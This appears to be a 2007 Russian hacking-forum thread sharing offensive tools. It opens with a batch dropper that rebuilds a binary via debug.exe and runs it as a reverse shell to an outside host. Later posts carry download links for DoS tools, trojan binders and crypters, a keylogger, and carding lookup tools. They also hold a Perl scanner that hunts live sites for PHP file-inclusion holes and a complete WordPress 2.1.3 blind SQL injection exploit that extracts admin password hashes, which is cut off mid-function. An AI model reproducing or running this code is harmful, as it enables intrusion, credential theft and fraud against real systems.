echo e 0200 >>123.hex && echo 00 00 00 00 00 00 00 00 4d 45 57 00 46 12 d2 c3 00 30 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 c0 02 d2 75 db 8a 16 eb d4 00 10 00 00 00 40 00 00 ef 02 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 c0 be 1c 40 40 00 8b de ad ad 50 ad 97 b2 80 a4 b6 80 ff 13 73 f9 33 c9 ff 13 73 16 33 c0 ff 13 73 21 b6 80 41 b0 10 ff 13 >>123.hex
echo e 0280 >>123.hex && echo 12 c0 73 fa 75 3e aa eb e0 e8 72 3e 00 00 02 f6 83 d9 01 75 0e ff 53 fc eb 26 ac d1 e8 74 2f 13 c9 eb 1a 91 48 c1 e0 08 ac ff 53 fc 3d 00 7d 00 00 73 0a 80 fc 05 73 06 83 f8 7f 77 02 41 41 95 8b c5 b6 00 56 8b f7 2b f0 f3 a4 5e eb 9b ad 85 c0 75 90 ad 96 ad 97 56 ac 3c 00 75 fb ff 53 f0 95 56 ad 0f c8 40 59 74 ec 79 07 ac 3c 00 75 fb 91 40 50 55 ff 53 f4 ab 75 e7 c3 00 00 00 00 00 >>123.hex
echo e 0300 >>123.hex && echo 33 c9 41 ff 13 13 c9 ff 13 72 f8 c3 b0 42 00 00 bd 42 00 00 00 00 00 00 00 40 40 00 30 01 40 00 00 10 40 00 00 10 40 00 68 1c 06 32 40 07 6a 01 e8 0e 7c 38 55 0c e8 42 02 c8 15 38 9e 6a 7e 38 ea 53 0c 7a 50 2c 16 74 41 30 fd 01 bf 55 b2 b1 33 6a 91 02 06 b2 7c 55 9a 27 a3 78 83 66 c7 05 64 7b 4f a6 38 67 bc 5d 50 66 94 3d 39 66 a3 68 7e 64 66 7e 21 7d 8b 73 0c d9 0a 6a 68 94 2d a1 >>123.hex
echo e 0380 >>123.hex && echo 3a 7a 6f 48 15 ea 4c 05 11 50 64 90 10 4d 44 55 91 14 3c 40 78 6a 28 10 68 5d 28 ff 35 30 74 e8 a4 9e 51 54 55 a1 55 8d bf 6e 0e 0a 08 90 22 0b e1 51 14 e8 1f 81 4b c3 ff 25 24 20 bb 6f 2a 1c 06 43 18 21 14 bd c3 22 08 71 cc 01 55 8b ec 81 c4 7c fe ff 88 56 57 e8 60 ac dd 89 45 fc 33 1d c9 8b 75 7e 38 3c 1d 74 07 1e 22 40 f7 41 eb f4 51 d1 72 e9 00 e1 58 3b c1 74 0b 5f 5e 30 b8 03 >>123.hex
echo e 0400 >>123.hex && echo b9 c9 c2 08 e1 86 49 8d bd 3c 70 e5 43 2a 09 cf 2f e0 02 b0 20 aa eb 73 f2 28 8d 85 15 39 8b f0 36 f8 33 2a 33 eb 1b 8b 03 66 32 07 ef 22 65 20 4d fe 22 11 e1 28 2d ed 94 08 83 b9 dc b7 30 4b 74 fb 3b 3a 4d 08 a8 15 59 65 1d 67 0a 4c 13 41 1d 0f 14 eb e6 aa 0d 36 07 19 87 38 f4 b0 7f c0 55 73 11 8b 7d 0c c6 17 b8 02 7f 82 a2 13 9d 68 b0 a0 58 34 33 0d 46 0d e6 d1 f7 e1 fe 58 a3 ee >>123.hex
echo e 0480 >>123.hex && echo e7 44 bb 1f 16 a9 ce 11 04 de 55 01 3c d4 14 d4 0e 1b 33 c0 4e ec 87 0b 70 d2 8a 06 46 3d 3c 02 b3 12 0e f7 df 90 eb 0b 2c 30 19 8d 0c 89 06 48 83 2d 0a c0 75 f1 e8 04 11 33 51 c2 38 e2 30 83 c4 07 f4 6a f5 e8 69 09 19 49 ff bd 82 aa 20 0b d0 2a 93 75 37 f8 50 22 9d 29 86 06 fc e8 4d 2f 68 8b 24 38 e6 53 1a 0f 08 8d 50 03 21 18 83 c0 04 e3 f9 ff fe 80 02 f7 d3 23 cb 81 e1 44 80 74 >>123.hex
echo e 0500 >>123.hex && echo 7c e9 6c c1 0c 60 75 77 06 f4 10 c0 40 02 d0 e1 1b c2 51 5b 3a 47 c4 49 19 ca 0c 57 06 08 30 00 00 30 40 00 63 30 6d 64 00 66 3f 40 00 14 38 20 40 03 77 73 32 5f 33 98 2e 64 6c e3 c0 80 67 07 65 74 68 6f 73 40 62 79 6e 61 7b 6d cf 1e 63 9e 3c f7 eb ff 0e 12 57 53 41 5d cf 61 72 46 75 70 18 79 68 ca 2c 73 13 4f 26 63 6b 62 ef c1 ff b8 03 6c 95 1a 72 ca 5e 6c 4c c7 57 d3 69 74 f3 46 >>123.hex
echo e 0580 >>123.hex && echo a7 bc 91 47 c3 4c 43 6f 6d 88 61 6e 64 36 4c 69 44 62 7e 80 76 72 fb 9d 3a 50 b7 82 e7 73 15 41 58 21 c0 64 48 d0 43 2f 60 00 00 00 00 00 66 3f 40 00 4c 6f 61 64 4c 69 62 72 61 72 79 41 00 47 65 74 50 72 6f 63 41 64 64 72 65 73 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 40 00 00 e9 74 be ff ff 00 00 00 02 00 00 00 0c 40 00 00 >>123.hex
echo r cx >>123.hex && echo 04ef >>123.hex && echo w >>123.hex && echo q >>123.hex && debug<123.hex && copy 1.dll reverse.exe && del 1.dll && del 123.hex
rem *******************EDIT YOUR HOSTNAME AND PORT HERE*************************
reverse.exe illwill.reverse-dns.com 8080
deleteit:
del reverse.exe
IF EXIST reverse.exe GOTO kill
del %0

Автор: Creeping Death 10.05.2007, 16:27

Acunetix Web Vulnerability Scanner

Acunetix Web Vulnerability Scanner automatically detects the following vulnerabilities in web applications:
· Cross site scripting
· SQL injection
· CRLF injection
· Code execution
· Directory traversal
· File inclusion
· Script source code disclosure
· Discovers files/directories that may contain sensitive information
· Looks for common files (such as logs, application traces, CVS web repositories), back-up files or directories
· Finds directory listings
· Discovers directories with weak permissions
· Discovers available web server technologies (such as WebDAV, FrontPage, etc.)
· Determines if dangerous HTTP methods are enabled on the web server (e.g. PUT, TRACE, DELETE)
· Inspects the HTTP version banners and looks for vulnerable products
· Tests password strength of applications.
Extend attacks
· With Acunetix Web Vulnerability Scanner, you can construct HTTP/HTTPS requests and analyze the responses using the HTTP editor.
Connection spy
· By enabling you to log, intercept and modify all HTTP/HTTPS traffic, Acunetix Web Vulnerability Scanner gives you an in-depth insight into what data your web application is sending.
Test password strength
· To test the strength of your passwords, you can perform a dictionary attack on basic HTTP, NTLM or form-based authentication.
Test database editor
· Acunetix Web Vulnerability Scanner includes a text database editor that permits you to add additional attacks to the test database (Enterprise & Consultant versions only).
Supports all major web technologies
· Applications utilizing CGI, PHP, ASP, ASP.NET can all be tested for vulnerabilities.
Scanning profiles
· Acunetix Web Vulnerability Scanner allows you to quickly scan sites with different options and identities.
Reporting
· You can save scan sessions to MS SQL Server/Access databases and generate complex reports from previous scan sessions using information stored in the database.


Requirements:

· 128 MB of RAM (256MB or higher recommended)
· 200 MB of available hard-disk space
· Microsoft Internet Explorer 5.1 (or higher)
· Microsoft SQL Server / Access if database is enabled (optional)


Limitations:

· 30 day trial
· The evaluation version is identical to the full version, however you will only be able to scan the Acunetix test websites add you will not be able to save the scan results


http://www.acunetix.com/vulnerability-scanner/wvs_sb_trial_4.exe

Автор: Creeping Death 10.05.2007, 17:29

PacketCreator 1.1
PacketCreator is provided to help network administrators to test their network, by using ARP cache poisoning, and generate ICMP packets to send over the LAN.
The main idea is to allow administrators using these kind of software to secure their network to several known attacks.
This tool can also redirect switched based networks traffic (dumping and forwarding is also provided).
It is possible to create a own made IP packet in which you can edit IP header or every ICMP field.


http://download.softpedia.ro/dl/d2418d478ba628c054d9a6c1406679f3/46432a11/100069721/software/NETWORK/PacketCreator_v1.1_Setup.exe

DoSHTTP 1.0

DoSHTTP is an easy to use and powerful HTTP Flood Denial of Service (DoS) Testing Software for Windows. DoSHTTP includes URL Verification, HTTP Redirection and performance monitoring.
DoSHTTP uses multiple asynchronous sockets to perform an effective HTTP Flood. DoSHTTP can be used simultaneously on multiple clients to emulate a Distributed Denial of Service (DDoS) attack.
DoSHTTP can help IT Professionals test web server performance and evaluate web server protection software. DoSHTTP was developed by certified IT Security and Software Development professionals.
Here are some key features of "DoSHTTP":
· Easy to use and powerful HTTP Flood Denial of Service (DoS) Testing Tool
· Uses multiple asynchronous sockets to perform an effective HTTP Flood
· Allows multiple simultaneous clients to emulate a Distributed Denial of Service (DDoS) Attack
· Supports HTTP Redirection for automatic page redirection (optional)
· Includes URL Verification that displays the response header and document
· Includes Performance Monitoring to track requests issued and responses received
· Allows customized User Agent header fields
· Allows user defined Socket and Request settings
· Supports numeric addressing for Target URLs
· Includes a comprehensive User Guide
Requirements:
· DoSHTTP must be used with an administrative account.
Limitations:
· Free 14-Day Trial


http://www.socketsoft.net/download/doshttp10_setup.exe


Nsauditor Network Security Auditor 1.6

Nsauditor reveals a variety of information, including installed software, users, shares, hotfixes, NetBios, drives, RPC, SQL and SNMP information, open ports.

Nsauditor Network Security Auditor is a network security scanner that allows to audit and monitor remote network computers for possible vulnerabilities, checks your network for all potential methods that a hacker might use to attack it.

Nsauditor is a complete networking utilities package that includes a wide range of tools for network auditing, scanning, monitoring and more.

You can discover network services and check them for vulnerabilities, list all TCP and UDP endpoints with their associated process, discover NetBios names, audit MS SQL servers, scan for common Adware traces and more.

The program also includes real-time network packet filtering and analyzing, remote network performance monitoring, network status monitoring, web proxy scanning, password auditing, intrusion detection system based on security events log analyzer and firewall system that allows to stop internet threats and block unwanted network connections, IP address lookup and more than 45 network tools for scanning, sniffing, enumerating and gaining access to machines, DNS and WHOIS lookups, e-mail validation and HTTP traffic generator.

The product contains a built-in database of known network security vulnerabilities, which allows you to select the items for scanning and add custom entries. Nsauditor can reveal and catalog a variety of information, including installed software, shares, users, drives, hotfixes, NetBios, RPC, SQL and SNMP information, open ports.

Nsauditor Network Security Auditor can also audit password and security policies as well as make a variety of network attack probes, such as stealth port scans, HTTP / CGI server auditing, registry auditing.

Nsauditor Network Security Auditor can sniff and use brute-force and dictionary attacks on LM and NTLM password hashes and expose the insecure ones.

Nsauditor does OS detection and automatically creates OS fingerprints which are not included in database. Reports can be generated in HTML and XML format.


http://www.nsauditor.com/downloads/nsauditor_setup.exe

Автор: Creeping Death 15.05.2007, 16:27

SQL Bruter by Raz0r
http://www.inattack.ru/download.php?id=358

Автор: Creeping Death 15.05.2007, 22:25

Приватный скрипт от Security-Teams.Net Crew для автоматизированного поиска уязвимостей в CGI-скриптах с помощью google. нашелся в паблике.

CODE
#! /usr/bin/perl

# ================================================================ #
# google-php-include-bugs searcher v 0.8 #
# ©oded by drmist\STNC #
# www.security-teams.net #
# #
# ATTENTION. THIS SCRIPT IS PRIVATE. #
# ONLY FOR STNC AND FRIENDS. NOT FOR SALE. #
# #
# Usage: perl script.pl --log=<log-file> --url=<test-script-url> #
# Test script: #
# <?php #
# error_reporting(0); #
# $s = md5("STNC"); #
# $code = eregi("windows", php_uname())+ #
# 2*eregi("apache", getenv("SERVER_SOFTWARE"))+ #
# 4*ini_get('safe_mode'); echo $s."[$code]".$s; #
# ?> #
# ================================================================ #

use IO::Socket;

@inc_bugs = ("page", "text", "print", "html", "url", "view", "show", "body", "cat",
"inc", "incl", "include", "read", "write", "data", "code", "fname",
"filename", "cont", "content", "menu", "open", "file", "id", "p", "f",
"seite", "pagina", "vista", "vue", "visao", "datei", "offnen", "corpo",
"corps", "ouvrir", "fichier", "abrir", "fichero", "inhalt", "contenu",
"conteudo");

@zones = ("com", "net", "org", "de", "fr", "uk", "br", "am",
"info", "name", "aero", "biz", "edu", "ws", "in",
"cn", "us", "be", "it", "cc", "tv", "ru", "su",
"jp", "kz", "se", "is", "ca", "gs", "ms", "vg",
"be", "fi", "gov");

@ftypes = ("php", "php3");

$boundary = "ca73bad132fa0c99fe9ce9efe9029e21"; # md5("STNC");

for($i = 0; $i < @ARGV; $i++)
{
if($ARGV[$i] =~ /^--log=(.*)$/) { $log = $1; }
elsif($ARGV[$i] =~ /^--url=(.*)$/) {$script = $1; }
}

if(!($script && $log)){ usage(); exit; }

foreach $inc(@inc_bugs)
{
foreach $zone(@zones)
{
foreach $ftype(@ftypes)
{
$request = "filetype:$ftype site:$zone inurl:$inc=";
print "\n[$request]\n";

$request =~ s/(.)/sprintf("%%%02x",ord($1))/eg;
@dn = ();

for($i = 0;$i < 10; $i++)
{
@temp = get("http://www.google.com/search?filter=0&num=100&start=".$i.
"00&q=$request") =~ /(http\:\/\/[a-z0-9\.\-\/\?\:\&\%\=\_]{5,})/gi;
foreach $url (@temp)
{
if($url !~ /($inc=[^\&]+)/i) { next; }
$left = $`; $right = $';
if($url =~ /https?\:\/\/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\/search\?q=cache:/i){ next; }
if($url =~ /google\.com/i){ next; }

($domain) = $url =~ /^http\:\/\/([a-z0-9\.\-]{5,})/;
if($domain =~ /^www\.(.+)$/) { $domain = $1; }
$f=0;foreach(@dn){if($_ eq $domain){$f++;last;}}if($f){next;}
push @dn, $domain;

$print = "$left$inc=[INCLUDE]$right";
if(($data) = get("$left$inc=$script\?$right") =~ /$boundary\[([0-9]+)\]$boundary/i)
{
$s = "$print - ".(($data % 2) ? "WINDOWS" : "UNIX").(($data > 3) ? ", SAFE_MODE" : "")."\n";
$count++;
print "[$count] $s";

open LOG, ">>$log";
print LOG $s;
close LOG;
}
else {
print "$print - no bugs\n";
}
}
}
}
}
}

sub timeout() { close $sock; }

sub get()
{
local $request = $_[0];
local $port = 80;
local $data = "";

if(local($server, $url) = $request =~ /^http\:\/\/([^\/]+)\/(.+)$/)
{
if($server =~ /^([^\:]+)\:([0-9]{2,5})$/){ $server = $1; $port = $2; }

$sock = IO::Socket::INET->new(
PeerAddr => $server,
PeerPort => $port,
Proto => 'tcp',
Type => SOCK_STREAM,
TimeOut => $timeout
) or return 0; # connection failed

print $sock "GET /$url HTTP/1.0\r\nHost: $server\r\n\r\n";

$SIG{ALRM} = \&timeout; alarm 10;
while(<$sock>){ $data .= $_; }
alarm 0; close $sock;
}

return $data;
}

sub usage()
{

print qq(Usage: perl $0 --log=<log-file> --url=<url-of-test-script-source>
Test script:
<?php
error_reporting(0);
\$s = md5("STNC");
\$code = eregi("windows", php_uname())+
2*eregi("apache", getenv("SERVER_SOFTWARE"))+
4*ini_get('safe_mode'); echo \$s."[\$code]".\$s;
?>
);

}


Thx to Gradiz

Автор: Creeping Death 16.05.2007, 08:19

CC2Bank 1.3

Описание: Эта программа поможет вам получить дополнительную информацию о банке сделавшем кредитную карточку.

http://soft.verified.ru/files/databases/cc2bank/cc2bank_1.3/cc2bank13.rar
http://soft.verified.ru/files/databases/cc2bank/cc2bank_1.3/hash.txt

CC2Bank ListGenerator 1.0

Описание: Прога ищет в текстовом фале номера кредитных каточек и подбирая к номеру информацию о банке выводит в список. Потом данные можно сортировать на своё усмотрение и сохранять в отдельный файл.
http://soft.verified.ru/files/databases/cc2bank_listgenerator/cc2bank_listgenerator_1.0/cc2banklg10.rar
http://soft.verified.ru/files/databases/cc2bank_listgenerator/cc2bank_listgenerator_1.0/hash.txt

Mars Banks Base 1.1

Описание: База данных по банкам. Содержит 11 баз: ABA номера банков США, routing номера банков США, БИНы кредитных карт для VISA, MasterCard, American Express, ZIP коды США, занятые телефоны США, регионы SSN, телефонные коды США, штаты США, штаты UK. Поддерживает поиск и фильтрацию, скины...

http://soft.verified.ru/files/databases/mars_banks_base/mars_banks_base_1.1/marsbanksbase11.exe
http://soft.verified.ru/files/databases/mars_banks_base/mars_banks_base_1.1/hash.txt

Zip Express 2.4b

Описание: Zip Express позволяет вам производить поиск по zip, городу, стране или штату.


http://soft.verified.ru/files/databases/zipexpress/zipexpress_2.4/zpex.zip
http://soft.verified.ru/files/databases/zipexpress/zipexpress_2.4/crack.rar
http://soft.verified.ru/files/databases/zipexpress/zipexpress_2.4/hash.txt

Автор: Gener 16.05.2007, 17:14

BE Joiner


Представляю свою [автор программы - begin end] версию программы класса джоинеров - BEJoiner. Она полностью бесплатна.


Характеристика и возможности:
-упаковка неограниченного числа файлов;
-смена иконки на любую из *.ico файла;
-компрессия пакером (UPack);
-малый размер стаба (в чистом виде 1,4 кбайт);
-на 12.05.2007 в плане проверки антивирусами полностью чист.

Просьба не распростанять эту программу дальше этого форума.
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как наберете 100 сообщений.

Автор: Creeping Death 22.05.2007, 19:37

PRIAMOS - SQL Injector & Scanner
http://rapidshare.com/files/32528869/PRIAMOS.v1.0.zip

Pretator v1.6 - BINDER
http://rapidshare.com/files/32528311/Pretator_v1.6.rar

Redbinder2.0.1
http://rapidshare.com/files/32312064/Redbinder_v_2.0.1.rar

Aase Binder/Packer/Crypter

Language: delphi
Description: bind as many files as you like make them all undetected
run binded files in memory/ extract them to file run hidden/visible
with parameters. server supports many parameters. choose output icon.
save & reload projects.


http://rapidshare.com/files/32263540/aase.rar

AIO - phpBB Tools

Includes:
+ phpBB Annihilator
+ phpBB Defacer
+ UC Forum Spam
+ phpBB Extractor
+ phpBB Spammer
+ phpBB Attacker
+ Bonus: Collection of phpBB exploits


http://rapidshare.com/files/32245240/aio_phpbb2_tools.rar

AntiDote v1.2
antidote 1.2 osce compress and scrambles servers and trojans in order to make them undetected.
http://rapidshare.com/files/32244567/AntiDote_v1.2_osCE.rar

Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как наберете 100 сообщений.

Автор: Creeping Death 22.05.2007, 22:45

avkhack keylogger

» Нажмите тут чтобы открыть/скрыть спойлер. «


http://rapidshare.com/files/32185028/avkhackteamkeyloggerzip.zip



erzip.zip]download[/url]

Автор: Creeping Death 24.05.2007, 18:06

Wordpress 2.1.3 admin-ajax.php SQL Injection Blind Fishing Exploit

CODE
<?php
error_reporting(E_ALL);
$norm_delay = 0;
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// WordPress 2.1.3 "admin-ajax.php" sql injection blind fishing exploit
// written by Janek Vind "waraxe"
// http://www.waraxe.us/
// 21. may 2007
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//=====================================================================
$outfile = './warlog.txt';// Log file
$url = 'http://localhost/wordpress.2.1.3/wp-admin/admin-ajax.php';
$testcnt = 300000;// Use bigger numbers, if server is slow, default is 300000
$id = 1;// ID of the target user, default value "1" is admin's ID
$suffix = '';// Override value, if needed
$prefix = 'wp_';// WordPress table prefix, default is "wp_"
//======================================================================

echo "Target: $url
";
echo "sql table prefix: $prefix
";

if(empty($suffix))
{
$suffix = md5(substr($url, 0, strlen($url) - 24));
}

echo "cookie suffix: $suffix
";

echo "testing probe delays
";

$norm_delay = get_normdelay($testcnt);
echo "normal delay: $norm_delay deciseconds
";

$hash = get_hash();

add_line("Target: $url");
add_line("User ID: $id");
add_line("Hash: $hash");

echo "
Work finished
";
echo "Questions and feedback - http://www.waraxe.us/
";
die("See ya! smile.gif
");
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
function get_hash()
{
$len = 32;
$field = 'user_pass';
$out = '';

echo "finding hash now ...
";

for($i = 1; $i < $len + 1; $i ++)
{
$ch = get_hashchar($field,$i);
echo "got $field pos $i --> $ch
";
$out .= "$ch";
echo "current value for $field: $out
";
}

echo "
Final result: $field=$out

";

return $out;
}
///////////////////////////////////////////////////////////////////////
function get_hashchar($field,$pos)
{
global $prefix, $suffix, $id, $testcnt;
$char = '';
$cnt = $testcnt * 4;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = " UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(ORD(SUBSTRING($field,$pos,1))%s,BENCHMARK($cnt,MD5(1337)),3)/*";

// First let's determine, if it's number or letter
$inj = sprintf($ipattern, $prefix, $id, ">57");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$letter = test_condition($post);

if($letter)
{
$min = 97;
$max = 102;
echo "char to find is [a-f]
";
}
else
{
$min = 48;
$max = 57;
echo "char to find is [0-9]
";
}

$curr = 0;

while(1)
{
$area = $max - $min;
if($area < 2 )
{
$inj = sprintf($ipattern, $prefix, $id, "=$max");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$eq = test_condition($post);

if($eq)
{
$char = chr($max);
}
else
{
$char = chr($min);
}

break;
}

$half = intval(floor($area / 2));
$curr = $min + $half;

$inj = sprintf($ipattern, $prefix, $id, ">$curr");
$post = sprintf($ppattern, $suffix, $inj, $suffix);

$bigger = test_condition($post);

if($bigger)
{
$min = $curr;
}
else
{
$max = $curr;
}

echo "curr: $curr--$max--$min
";
}

return $char;
}
///////////////////////////////////////////////////////////////////////
function test_condition($p)
{
global $url, $norm_delay;
$bret = false;
$maxtry = 10;
$try = 1;

while(1)
{
$start = getmicrotime();
$buff = make_post($url, $p);
$end = getmicrotime();

if($buff === '-1')
{
break;
}
else
{
echo "test_condition() - try $try - invalid return value ...
";
$try ++;
if($try > $maxtry)
{
die("too many tries - exiting ...
");
}
else
{
echo "trying again - try $try ...
";
}
}
}

$diff = $end - $start;
$delay = intval($diff * 10);

if($delay > ($norm_delay * 2))
{
$bret = true;
}

return $bret;
}
///////////////////////////////////////////////////////////////////////
function get_normdelay($testcnt)
{
$fa = test_md5delay(1);
echo "$fa
";
$sa = test_md5delay($testcnt);
echo "$sa
";
$fb = test_md5delay(1);
echo "$fb
";
$sb = test_md5delay($testcnt);
echo "$sb
";
$fc = test_md5delay(1);
echo "$fc
";
$sc = test_md5delay($testcnt);
echo "$sc
";

$mean_nondelayed = intval(($fa + $fb + $fc) / 3);
echo "mean nondelayed - $mean_nondelayed dsecs
";
$mean_delayed = intval(($sa + $sb + $sc) / 3);
echo "mean delayed - $mean_delayed dsecs
";

return $mean_delayed;
}
///////////////////////////////////////////////////////////////////////
function test_md5delay($cnt)
{
global $url, $id, $prefix, $suffix;

// delay in deciseconds
$delay = -1;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = ' UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(LENGTH(user_pass)>31,BENCHMARK(%d,MD5(1337)),3)/*';
$inj = sprintf($ipattern, $prefix, $id, $cnt);
$post = sprintf($ppattern, $suffix, $inj, $suffix);

$start = getmicrotime();
$buff = make_post($url, $post);
$end = getmicrotime();

if(intval($buff) !== -1)
{
die("test_md5delay($cnt) - invalid return value, exiting ...");
}

$diff = $end - $start;
$delay = intval($diff * 10);

return $delay;
}
///////////////////////////////////////////////////////////////////////
function getmicrotime()
{
list($usec, $sec) = explode(" ", microtime());
return ((float)$usec + (float)$sec);
}
///////////////////////////////////////////////////////////////////////
function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE)
{
$ch = curl_init();
$timeout = 120;
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)');

if(!empty($cookie))
{
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
}

if(!empty($referer))
{
curl_setopt ($ch, CURLOPT_REFERER, $referer);
}

if($headers === TRUE)
{
curl_setopt ($ch, CURLOPT_HEADER, TRUE);
}
else
{
curl_setopt ($ch, CURLOPT_HEADER, FALSE);
}

$fc = curl_exec($ch);
curl_close($ch);

return $fc;
}
///////////////////////////////////////////////////////////////////////
function add_line($buf)
{
global $outfile;

$buf .= "
";
$fh = fopen($outfile, 'ab');
fwrite($fh, $buf);
fclose($fh);

}
///////////////////////////////////////////////////////////////////////
?>


ver. 2
CODE
<?php
error_reporting(E_ALL);
$norm_delay = 0;
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// WordPress 2.1.3 "admin-ajax.php" sql injection blind fishing exploit
// written by Janek Vind "waraxe"
// http://www.waraxe.us/
// original version released - 21. may 2007
// added login retrieving - 23. may 2007
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//=====================================================================
$outfile = './warlog.txt';// Log file
$url = 'http://localhost/wordpress.2.1.3/wp-admin/admin-ajax.php';
$testcnt = 300000;// Use bigger numbers, if server is slow, default is 300000
$id = 1;// ID of the target user, default value "1" is admin's ID
$suffix = '';// Override value, if needed
$prefix = 'wp_';// WordPress table prefix, default is "wp_"
$get_hash = true;// md5 hash retrieving - true or false
$get_login = true;// user login retrieving - true or false
//======================================================================

echo "

WordPress 2.1.3 blind sql injection exploit by waraxe

";
echo "Target: $url
";
echo "sql table prefix: $prefix
";

if(empty($suffix))
{
$suffix = md5(substr($url, 0, strlen($url) - 24));
}

echo "cookie suffix: $suffix
";

echo "testing probe delays
";

$norm_delay = get_normdelay($testcnt);
echo "normal delay: $norm_delay deciseconds
";

if($get_hash)
{
echo "trying to get md5 hash from target
";
$hash = get_hash();
}

if($get_login)
{
echo "trying to get user login from target
";
$login = get_login();
}

add_line("Target: $url");
add_line("User ID: $id");
if($get_login)
{
add_line("Login: $login");
}
if($get_hash)
{
add_line("Hash: $hash");
}

echo "
Work finished
";
echo "Questions and feedback - http://www.waraxe.us/
";
die("See ya! smile.gif
");
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
function get_login()
{
$field = 'user_login';
$out = '';

echo "first we need user login length ...
";
$len = get_length($field, 60);
echo "user login length is $len chars
";
echo "finding user login now ...
";

for($i = 1; $i < $len + 1; $i ++)
{
$ch = get_anychar($field,$i);
echo "got $field pos $i --> $ch
";
$out .= "$ch";
echo "current value for $field: $out
";
}

echo "
Final result: $field=$out

";

return $out;
}
///////////////////////////////////////////////////////////////////////
function get_length($field, $maxlen = 60)
{
global $prefix, $suffix, $id, $testcnt;
$len = 0;
$cnt = $testcnt * 4;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = " UNION ALL SELECT 1,2,$field,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(LENGTH($field)%s,BENCHMARK($cnt,MD5(1337)),3)/*";

$min = 0;
$max = $maxlen;
echo "starting $field length retrieve
";

$curr = 0;

while(1)
{
$area = $max - $min;
if($area < 2 )
{
$inj = sprintf($ipattern, $prefix, $id, "=$max");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$eq = test_condition($post);

if($eq)
{
$len = $max;
}
else
{
$len = $min;
}

break;
}

$half = intval(floor($area / 2));
$curr = $min + $half;

$inj = sprintf($ipattern, $prefix, $id, ">$curr");
$post = sprintf($ppattern, $suffix, $inj, $suffix);

$bigger = test_condition($post);

if($bigger)
{
$min = $curr;
}
else
{
$max = $curr;
}

echo "curr: $curr--$max--$min
";
}

return $len;

}
///////////////////////////////////////////////////////////////////////
function get_hash()
{
$len = 32;
$field = 'user_pass';
$out = '';

echo "finding hash now ...
";

for($i = 1; $i < $len + 1; $i ++)
{
$ch = get_hashchar($field,$i);
echo "got $field pos $i --> $ch
";
$out .= "$ch";
echo "current value for $field: $out
";
}

echo "
Final result: $field=$out

";

return $out;
}
///////////////////////////////////////////////////////////////////////
function get_anychar($field,$pos)
{
global $prefix, $suffix, $id, $testcnt;
$char = '';
$cnt = $testcnt * 4;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = " UNION ALL SELECT 1,2,$field,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(ORD(SUBSTRING($field,$pos,1))%s,BENCHMARK($cnt,MD5(1337)),3)/*";

$min = 32;
$max = 255;
$curr = 0;

while(1)
{
$area = $max - $min;
if($area < 2 )
{
$inj = sprintf($ipattern, $prefix, $id, "=$max");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$eq = test_condition($post);

if($eq)
{
$char = chr($max);
}
else
{
$char = chr($min);
}

break;
}

$half = intval(floor($area / 2));
$curr = $min + $half;

$inj = sprintf($ipattern, $prefix, $id, ">$curr");
$post = sprintf($ppattern, $suffix, $inj, $suffix);

$bigger = test_condition($post);

if($bigger)
{
$min = $curr;
}
else
{
$max = $curr;
}

echo "curr: $curr--$max--$min
";
}

return $char;
}
///////////////////////////////////////////////////////////////////////
function get_hashchar($field,$pos)
{
global $prefix, $suffix, $id, $testcnt;
$char = '';
$cnt = $testcnt * 4;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = " UNION ALL SELECT 1,2,$field,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(ORD(SUBSTRING($field,$pos,1))%s,BENCHMARK($cnt,MD5(1337)),3)/*";

// First let's determine, if it's number or letter
$inj = sprintf($ipattern, $prefix, $id, ">57");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$letter = test_condition($post);

if($letter)
{
$min = 97;
$max = 102;
echo "char to find is [a-f]
";
}
else
{
$min = 48;
$max = 57;
echo "char to find is [0-9]
";
}

$curr = 0;

while(1)
{
$area = $max - $min;
if($area < 2 )
{
$inj = sprintf($ipattern, $prefix, $id, "=$max");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$eq = test_condition($post);

if($eq)
{
$char = chr($max);
}
else
{
$char = chr($min);
}

break;
}

$half = intval(floor($area / 2));
